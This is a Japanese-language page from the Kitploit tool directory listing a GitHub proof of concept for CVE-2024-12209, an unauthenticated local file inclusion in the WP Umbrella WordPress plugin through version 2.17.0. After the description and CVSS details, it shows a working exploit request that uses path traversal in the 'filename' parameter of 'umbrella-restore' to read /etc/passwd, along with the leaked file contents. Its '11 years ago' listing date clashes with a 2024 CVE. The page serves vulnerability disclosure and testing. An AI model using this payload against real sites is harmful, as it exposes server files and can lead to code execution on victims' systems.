Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-12209 — WP Umbrella: 更新・バックアップ・復元・監視 <= 2.17.0 - 認証不要のローカルファイルインクルージョン | Kitploit
ツール/GitHubGitHub/randomrobbiebf/cve-2024-12209
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubrandomrobbiebf/cve-2024-12209

CVE-2024-12209

WP Umbrella: 更新・バックアップ・復元・監視 <= 2.17.0 - 認証不要のローカルファイルインクルージョン

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-12209

WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - 認証されていないローカルファイルインクルード

説明

WP Umbrella: Update Backup Restore & Monitoring WordPressプラグインは、バージョン2.17.0までの全バージョンにおいて、'umbrella-restore'アクションの'filename'パラメータを介したローカルファイルインクルードの脆弱性があります。これにより、認証されていない攻撃者がサーバー上の任意のファイルをインクルードして実行できるようになり、それらのファイル内の任意のPHPコードの実行が可能になります。これはアクセス制御のバイパス、機密データの取得、または画像やその他の「安全な」ファイルタイプがアップロードされてインクルードされる場合のコード実行に悪用される可能性があります。

詳細

  • Type: plugin
  • Slug: wp-health
  • Affected Version: 2.17.0
  • CVSS Score: 9.8
  • CVSS Rating: Critical
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12209
  • Status: Active

POC

root@kitploit:~
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
ツールをダウンロード